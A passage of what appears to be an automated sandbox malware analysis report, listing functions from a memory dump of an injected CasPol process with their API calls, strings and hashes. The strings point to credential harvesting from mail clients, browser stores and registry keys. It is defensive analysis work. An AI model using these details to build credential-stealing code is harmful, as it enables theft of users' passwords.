                                                                                                                                                                                  • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                                                                                                                                                                                  • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                                                                                                                                                                                  • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                                                                                                                                                                                  Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                                                                                                                                                                                  • memset.MSVCRT ref: 00408258
                                                                                                                                                                                    • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                                                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Close$EnumOpenmemset
                                                                                                                                                                                  • String ID: Software\Google\Google Desktop\Mailboxes
                                                                                                                                                                                  • API String ID: 2255314230-2212045309
                                                                                                                                                                                  • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                  • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                                                                                                                                                                                  • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                                                                                                                                                                                  Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C28C
                                                                                                                                                                                  • SetFocus.USER32(?), ref: 0040C314
                                                                                                                                                                                    • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: FocusMessagePostmemset
                                                                                                                                                                                  • String ID: S_@$l
                                                                                                                                                                                  • API String ID: 3436799508-4018740455
                                                                                                                                                                                  • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                  • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                                                                                                                                                                                  • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                                                                                                                                                                                  Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004092C0
                                                                                                                                                                                  • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                                                                                                                                                                                  • _mbscpy.MSVCRT(?,?), ref: 004092FC
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: PrivateProfileString_mbscpymemset
                                                                                                                                                                                  • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                                                                                                                                                                                  • API String ID: 408644273-3424043681
                                                                                                                                                                                  • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                  • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                                                                                                                                                                                  • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                                                                                                                                                                                  Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscpy
                                                                                                                                                                                  • String ID: C^@$X$ini
                                                                                                                                                                                  • API String ID: 714388716-917056472
                                                                                                                                                                                  • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                  • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                                                                                                                                                                                  • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                                                                                                                                                                                  • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                                                                                                                                                                                  Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                                                                                                                                                                                    • Part of subcall function 00406FC7: _mbscpy.MSVCRT(?,?,?,00000000,0000003C,?,?,00401018,MS Sans Serif,0000000A,00000001), ref: 00407011
                                                                                                                                                                                  • CreateFontIndirectA.GDI32(?), ref: 0040101F
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                                                                                                                                                                                  • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                                                                                                                                                                                  • String ID: MS Sans Serif
                                                                                                                                                                                  • API String ID: 3492281209-168460110
                                                                                                                                                                                  • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                  • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                                                                                                                                                                                  • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                                                                                                                                                                                  • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                                                                                                                                                                                  Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ClassName_strcmpimemset
                                                                                                                                                                                  • String ID: edit
                                                                                                                                                                                  • API String ID: 275601554-2167791130
                                                                                                                                                                                  • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                  • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                                                                                                                                                                                  • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                                                                                                                                                                                  • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                                                                                                                                                                                  Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: strlen$_mbscat
                                                                                                                                                                                  • String ID: 3CD
                                                                                                                                                                                  • API String ID: 3951308622-1938365332
                                                                                                                                                                                  • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                  • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                                                                                                                                                                                  • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                                                                                                                                                                                  • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                                                                                                                                                                                  Function 00443C44 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: _mbscat$_mbscpy
                                                                                                                                                                                  • String ID: Password2
                                                                                                                                                                                  • API String ID: 2600922555-1856559283
                                                                                                                                                                                  • Opcode ID: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                  • Instruction ID: daa9138b3154c9efe9c83666f212cf2f945430f9457ac718319f22168f8299cd
                                                                                                                                                                                  • Opcode Fuzzy Hash: 8d83a753bd2278aecac4212cdf66134528e9acc94ce1ae697df6f496e3d29f98
                                                                                                                                                                                  • Instruction Fuzzy Hash: 5BC01202A4667032210275555D07F8E5818CE9279B704005BB90832113D61D965542EF
                                                                                                                                                                                  Function 00410D0E Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • LoadLibraryA.KERNEL32(shell32.dll), ref: 00410D1C
                                                                                                                                                                                  • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 00410D31
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: AddressLibraryLoadProc
                                                                                                                                                                                  • String ID: SHGetSpecialFolderPathA$shell32.dll
                                                                                                                                                                                  • API String ID: 2574300362-543337301
                                                                                                                                                                                  • Opcode ID: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                  • Instruction ID: ef400fb4b1d3fc6097741d3c7ce2aeca37e2dca3c44752f23935f4d935815712
                                                                                                                                                                                  • Opcode Fuzzy Hash: bd9125e53ebb38e22ea027c358b92ac6a95cbb2b5ce42350ffb603c3f4eeef8b
                                                                                                                                                                                  • Instruction Fuzzy Hash: C9D0C9F8D063099AE7005BA1AD297167AB4E719312F041536A540A5263EBBCD094CE1D
                                                                                                                                                                                  Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: rows deleted
                                                                                                                                                                                  • API String ID: 2221118986-571615504
                                                                                                                                                                                  • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                  • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                                                                                                                                                                                  • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                                                                                                                                                                                  • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                                                                                                                                                                                  Function 0041BC6C Relevance: 6.3, APIs: 5, Instructions: 82COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(?,00000000,00000030,00000000), ref: 0041BC7F
                                                                                                                                                                                  • memcpy.MSVCRT(?,-00000030,00000030,?,00000000,00000030,00000000), ref: 0041BC95
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041BCA4
                                                                                                                                                                                  • memcmp.MSVCRT ref: 0041BCEC
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000030,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0041BD07
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy$memcmp
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3384217055-0
                                                                                                                                                                                  • Opcode ID: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                  • Instruction ID: 8228d9f6412a3e952053f7d3f56c39de874a44e07f5fc6281cc9d0b5593e34d3
                                                                                                                                                                                  • Opcode Fuzzy Hash: a7e4a582387d1845e8bd5b90d9047dd349a2d991c238cbacbbbcfe7ad7334891
                                                                                                                                                                                  • Instruction Fuzzy Hash: C8215172E102896BEB19DBA5D846FAF73FCEB84700F00446AB511D7281FB28E644C765
                                                                                                                                                                                  Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ??2@$memset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1860491036-0
                                                                                                                                                                                  • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                  • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                                                                                                                                                                                  • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                                                                                                                                                                                  • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                                                                                                                                                                                  Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 004048C2
                                                                                                                                                                                  • memset.MSVCRT ref: 004048D6
                                                                                                                                                                                  • memset.MSVCRT ref: 004048EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?,?,?), ref: 004048FC
                                                                                                                                                                                  • memcpy.MSVCRT(?,00406667,?,?,00406667,?,?,00000000,000000FF,?,00000000,000000FF,?,00000000,000000FF,?), ref: 0040490E
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                  • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                  • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                                                                                                                                                                                  • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                                                                                                                                                                                  • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                                                                                                                                                                                  Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2C2
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2D8
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D2EA
                                                                                                                                                                                  • memcpy.MSVCRT(?,?,00000010,?,00000000,00000000,?,?,?,?,?,?,00000000,0040381A,00000000), ref: 0040D30F
                                                                                                                                                                                  • memset.MSVCRT ref: 0040D319
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset$memcpy
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 368790112-0
                                                                                                                                                                                  • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                  • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                                                                                                                                                                                  • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                                                                                                                                                                                  • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                                                                                                                                                                                  Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • __allrem.LIBCMT ref: 00425850
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                                                                                                                                                                                  • __allrem.LIBCMT ref: 00425933
                                                                                                                                                                                  • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 1992179935-0
                                                                                                                                                                                  • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                  • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                                                                                                                                                                                  • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                                                                                                                                                                                  • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                                                                                                                                                                                  Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  Strings
                                                                                                                                                                                  • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                                                                                                                                                                                  • too many SQL variables, xrefs: 0042C6FD
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memset
                                                                                                                                                                                  • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                                                                                                                                                                                  • API String ID: 2221118986-515162456
                                                                                                                                                                                  • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                  • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                                                                                                                                                                                  • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                                                                                                                                                                                  • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                                                                                                                                                                                  Function 0042FF31 Relevance: 6.1, APIs: 1, Strings: 3, Instructions: 144COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memcpy.MSVCRT(00000000,?,00000000), ref: 0043007E
                                                                                                                                                                                  Strings
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: memcpy
                                                                                                                                                                                  • String ID: $, $CREATE TABLE
                                                                                                                                                                                  • API String ID: 3510742995-3459038510
                                                                                                                                                                                  • Opcode ID: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                  • Instruction ID: b8263f634f048474639948e4306e081d81924a11902ad0262d34aeb61c893b0c
                                                                                                                                                                                  • Opcode Fuzzy Hash: ec2d01fe33c012397d4d1731dfc45432bb5b9ee0a9ad26789851577151ff7e1c
                                                                                                                                                                                  • Instruction Fuzzy Hash: C351A472D00129DFCF10CF94D541AAFB7F4EF49319F61406BE840EB205E778AA4A8B98
                                                                                                                                                                                  Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                    • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                                                                                                                                                                                  • memset.MSVCRT ref: 004026AD
                                                                                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                                                                                                                                                                                    • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                                                                                                                                                                                    • Part of subcall function 004108E5: memcpy.MSVCRT(?,00000000,?,00000001,?,?,?,00000000), ref: 00410961
                                                                                                                                                                                    • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                                                                                                                                                                                  • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                                                                                                                                                                                  • LocalFree.KERNEL32(?), ref: 004027A6
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                                                                                                                                                                                  • String ID:
                                                                                                                                                                                  • API String ID: 3503910906-0
                                                                                                                                                                                  • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                  • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                                                                                                                                                                                  • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                                                                                                                                                                                  • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                                                                                                                                                                                  Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                                                                                                                                                                                  Download Yara Rule
                                                                                                                                                                                  APIs
                                                                                                                                                                                  • memset.MSVCRT ref: 0040C922
                                                                                                                                                                                  • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                                                                                                                                                                                  • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                                                                                                                                                                                  • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                  • Source File: 0000001F.00000002.542129895.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                  • Snapshot File: hcaresult_31_2_400000_CasPol.jbxd
                                                                                                                                                                                  Similarity
                                                                                                                                                                                  • API ID: Message$MenuPostSendStringmemset
